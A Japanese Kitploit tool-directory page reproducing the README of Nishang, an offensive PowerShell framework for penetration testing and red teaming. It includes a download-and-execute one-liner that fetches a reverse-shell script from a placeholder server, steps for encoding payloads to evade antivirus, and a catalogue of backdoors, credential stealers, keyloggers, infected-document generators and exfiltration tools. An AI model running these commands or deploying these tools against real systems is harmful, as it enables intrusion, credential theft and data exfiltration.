Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nishang — Nishang - レッドチーム、ペネトレーションテスト、攻撃的セキュリティのための攻撃型PowerShell | Kitploit
ツール/GitHubGitHub/samratashok/nishang
パスワードクラッキングフィッシングツール特権昇格ペイロード生成エクスプロイト横移動データ流出情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング
10.0k2.5k1273年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubsamratashok/nishang

nishang

Nishang - レッドチーム、ペネトレーションテスト、攻撃的セキュリティのための攻撃型PowerShell

リポジトリを見る

Nishang

Nishangは、攻撃的セキュリティ、ペネトレーションテスト、レッドチーム活動においてPowerShellを活用するためのフレームワークであり、スクリプトとペイロードのコレクションです。Nishangはペネトレーションテストの全フェーズで有用です。

作成者: Nikhil Mittal Altered Security - 実践的なレッドチームおよびエンタープライズセキュリティトレーニング! の創設者

使用方法

現在のPowerShellセッションにすべてのスクリプトをインポートします(PowerShell v3以降)。

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

個別のスクリプトはドットソーシングで使用します。

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

スクリプトや関数のヘルプを表示するには、以下を使用します:

root@kitploit:~
PS C:\nishang> Get-Help [スクリプト名] -full

バージョン0.3.8以降、ヘルプはスクリプトそのものではなく、スクリプト実行後にロードされる関数に対して利用可能であることに注意してください。すべての場合において、関数名はスクリプト名と同じです。

例えば、Get-WLAN-Keys.ps1のヘルプを表示するには、以下を使用します:

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

アンチウイルス

Nishangのスクリプトは、多くのアンチウイルスによって悪意のあるものとして検出されます。ターゲット上のスクリプトはメモリ上で使用することを意図しており、PowerShellで簡単に実行できます。メモリ上でPowerShellスクリプトを実行する2つの基本的な方法:

方法1. メモリ内ダウンロードと実行を使用: 以下のコマンドを使用して、リモートシェル、meterpreterのネイティブシェル、ウェブシェルなどからPowerShellスクリプトを実行し、そのエクスポートされた関数を利用します。Nishangのすべてのスクリプトは、現在のPowerShellセッションに同じ名前の関数をエクスポートします。

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

方法2. PowerShellの-encodedcommand(または-e)パラメータを使用する Nishangのすべてのスクリプトは、現在のPowerShellセッションに同じ名前の関数をエクスポートします。そのため、非PowerShellシェルからencodedcommandパラメータを使用する場合は、スクリプト自体に関数呼び出し(引用符なし)"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"を追加してください。

NishangのInvoke-Encodeを使用してスクリプトをエンコードする:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

エンコードされたデータは .\encoded.txt に書き込まれました

エンコードされたコマンドは .\encodedcommand.txt に書き込まれました

上記から、encodedcommand.txtのエンコードされたスクリプトを使用し、コマンドが実行可能なターゲット(リモートシェル、meterpreterのネイティブシェル、ウェブシェルなど)で以下のように実行します:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

スクリプトが依然として検出される場合は、関数名とパラメータ名を変更し、ヘルプコンテンツを削除することで回避できる場合があります。

Windows 10のAMSIがスクリプトの実行をブロックする場合は、次のブログを参照してください:http://www.labofapenetrationtester.com/2016/09/amsi.html

スクリプト

Nishangには現在、以下のスクリプトとペイロードが含まれています。

ActiveDirectory

Set-DCShadowPermissions

DCShadowに必要な最小限の権限を提供するためにADオブジェクトを変更します。

Antak - Webshell

Antak

このwebshellを使用して、PowerShellスクリプトのメモリ内実行、コマンドの実行、ファイルのダウンロードおよびアップロードが可能です。

バックドア

HTTP-Backdoor

サードパーティのWebサイトから指示を受け取り、PowerShellスクリプトをメモリ内で実行できるバックドア。

DNS_TXT_Pwnage

DNS TXTクエリからコマンドやPowerShellスクリプトを受信し、ターゲット上で実行し、クエリを使用してリモート制御できるバックドア。

Execute-OnTime

指定した時間にターゲット上でPowerShellスクリプトを実行できるバックドア。

Gupt-Backdoor

WLAN SSIDから接続せずにコマンドやスクリプトを受信できるバックドア。

Add-ScrnSaveBackdoor

Windowsのスクリーンセーバーをリモートコマンドおよびスクリプト実行に使用できるバックドア。

Invoke-ADSBackdoor

代替データストリームとWindowsレジストリを使用して永続性を実現するバックドア。

Add-RegBackdoor

よく知られたDebuggerトリックを使用して、Sticky keysやUtilman(Windowsキー + U)でペイロードを実行するバックドア。

Set-RemoteWMI

DCOMおよびWMI名前空間の権限を変更し、非管理ユーザーにアクセスを許可します。

Set-RemotePSRemoting

PowerShellリモート処理の権限を変更し、非管理ユーザーにアクセスを許可します。

バイパス

Invoke-AmsiBypass

公開されているAMSIのバイパス/回避方法の実装。

クライアント

Out-CHM

PowerShellコマンドとスクリプトを実行できる感染済みCHMファイルを作成します。

Out-Word

Wordファイルを作成し、既存のファイルに感染させてPowerShellコマンドとスクリプトを実行します。

Out-Excel

Excelファイルを作成し、既存のファイルに感染させてPowerShellコマンドとスクリプトを実行します。

Out-HTA

Webサーバーに展開し、フィッシングキャンペーンで使用できるHTAファイルを作成します。

Out-Java

アプレットと共にスクリプトおよびコマンド実行に使用できる署名付きJARファイルを作成します。

Out-Shortcut

PowerShellコマンドとスクリプトを実行できるショートカットファイルを作成します。

Out-WebQuery

フィッシング認証情報やSMBハッシュ用のIQYファイルを作成します。

Out-JS

PowerShellコマンドとスクリプトを実行できるJSファイルを作成します。

Out-SCT

PowerShellコマンドとスクリプトを実行できるSCTファイルを作成します。

Out-SCF

NTLMハッシュチャレンジのキャプチャに使用できるSCFファイルを作成します。

権限昇格

Enable-DuplicateToken

SYSTEM権限が必要な場合に使用。

Remove-Update

パッチを削除して脆弱性を導入。

Invoke-PsUACme

UACをバイパス。

実行

Download-Execute-PS

PowerShellスクリプトをダウンロードしてメモリ内で実行。

Download_Execute

テキスト形式の実行可能ファイルをダウンロードし、実行可能ファイルに変換して実行。

Execute-Command-MSSQL

十分な権限があるMSSQLサーバーで、PowerShellコマンド、ネイティブコマンド、またはSQLコマンドを実行。

Execute-DNSTXT-Code

DNS TXTクエリを使用してメモリ内でシェルコードを実行。

Out-RundllCommand

rundll32.exeを使用してPowerShellコマンドとスクリプト、またはリバースPowerShellセッションを実行。

収集

Check-VM

仮想マシンかどうかを確認。

Copy-VSS

ボリュームシャドウコピーサービスを使用してSAMファイルをコピー。

Invoke-CredentialsPhish

ユーザーを騙してプレーンテキストの認証情報を入力させる。

FireBuster FireListener

出口検査用のスクリプトペア。

Get-Information

ターゲットから有用な情報を取得。

Get-LSASecret

ターゲットからLSAシークレットを取得。

Get-PassHashes

ターゲットからパスワードハッシュを取得。

Get-WLAN-Keys

ターゲットからWLANキーをプレーンテキストで取得。

Keylogger

ターゲットのキーストロークを記録。

Invoke-MimikatzWdigestDowngrade

Windows 8.1およびServer 2012でユーザーパスワードをプレーンテキストでダンプ。

Get-PassHints

Windowsユーザーのパスワードヒントをターゲットから取得。

Show-TargetScreen

コールバックし、MJPEGを使用してターゲット画面をストリーミング。

Invoke-Mimikatz

mimikatzをメモリにロード。更新済みでカスタマイズ可能。

Invoke-Mimikittenz

正規表現を使用してターゲットプロセス(ブラウザなど)のメモリから有用な情報を抽出。

Invoke-SSIDExfil

WLAN SSIDを使用してユーザー認証情報などの情報を流出。

Invoke-SessionGopher

Unixマシンにアクセスするために使用される管理ジャンプボックスやコンピュータを特定。

MITM

Invoke-Interceptor

MITM攻撃用のローカルHTTPSプロキシ。

ピボット

Create-MultipleSessions

複数のコンピュータで認証情報を確認し、PSSessionを作成。

Run-EXEonRemote 複数のマシンに実行可能ファイルをコピーして実行。

Invoke-NetworkRelay コンピュータ間のネットワークリレーを作成。

Prasadhak

Prasadhak

実行中のプロセスのハッシュをVirusTotalデータベースと照合。

スキャン

Brute-Force

FTP、Active Directory、MSSQL、Sharepointをブルートフォース。

Port-Scan

便利なポートスキャナ。

Powerpreter

Powerpreter

nishangの全機能を1つのスクリプトモジュールにまとめたもの。

シェル

Invoke-PsGcat

指定されたGmailアカウントにコマンドとスクリプトを送信し、Invoke-PsGcatAgentで実行。

Invoke-PsGcatAgent

Invoke-PsGcatから送信されたコマンドとスクリプトを実行。

Invoke-PowerShellTcp

インタラクティブなPowerShellリバースコネクトまたはバインドシェル。

Invoke-PowerShellTcpOneLine

Invoke-PowerShellTcpの簡略版。2つのツイートに収まるスケルトンバージョンも含む。

Invoke-PowerShellTcpOneLineBind

Invoke-PowerShellTcpOneLineのバインド版。

Invoke-PowerShellUdp

UDP上のインタラクティブなPowerShellリバースコネクトまたはバインドシェル。

Invoke-PowerShellUdpOneLine

Invoke-PowerShellUdpの簡略版。

Invoke-PoshRatHttps

HTTPS上のリバースインタラクティブPowerShell。

Invoke-PoshRatHttp

HTTP上のリバースインタラクティブPowerShell。

Remove-PoshRat

Invoke-PoshRatHttps使用後のシステムクリーンアップ。

Invoke-PowerShellWmi

WMIを使用したインタラクティブPowerShell。

Invoke-PowerShellIcmp

ICMP上のインタラクティブなPowerShellリバースシェル。

Invoke-JSRatRundll

rundll32.exeを使用したHTTP上のインタラクティブなPowerShellリバースシェル。

Invoke-JSRatRegsvr

regsvr32.exeを使用したHTTP上のインタラクティブなPowerShellリバースシェル。

ユーティリティ

Add-Exfiltration

Gmail、Pastebin、Webサーバー、DNSへのデータ流出機能を任意のスクリプトに追加。

Add-Persistence

スクリプトに再起動時の永続性機能を追加。

Remove-Persistence

Add-Persistenceスクリプトによって追加された永続性を削除。

Do-Exfiltration

任意のスクリプトにパイプ(|)して出力を流出。

Download

ファイルをターゲットに転送。

Parse_Keys

キーロガーによって記録されたキーを解析。

Invoke-Encode

スクリプトまたは文字列をエンコードおよび圧縮。

Invoke-Decode

Invoke-Encodeからのスクリプトまたは文字列をデコードおよび解凍。

Start-CaptureServer

Basic認証とSMBハッシュを記録するWebサーバーを実行。

ConvertTo-ROT13

文字列をROT13にエンコード、またはROT13文字列をデコード。

Out-DnsTxt

他のスクリプトで使用できるDNS TXTレコードを生成。

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

アップデート

Nishangのアップデートについては、私のブログ http://labofapenetrationtester.com およびTwitter @nikhil_mitt でご確認ください。

バグ、フィードバック、機能リクエスト

バグを発見した場合や機能リクエストがある場合は、Issueを報告してください。メールは nikhil [dot] uitrgpv at gmail.com までお送りください。

メーリングリスト

フィードバック、ディスカッション、機能リクエストについては、http://groups.google.com/group/nishang-users に参加してください。

コントリビューション

Nishangへのコントリビューションを常に歓迎しています。リクエストを送信するか、メールをお送りください。

ブログ記事

初心者向けの役立つブログ記事:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Nishangに関するすべての投稿:

http://www.labofapenetrationtester.com/search/label/Nishang

ツールをダウンロード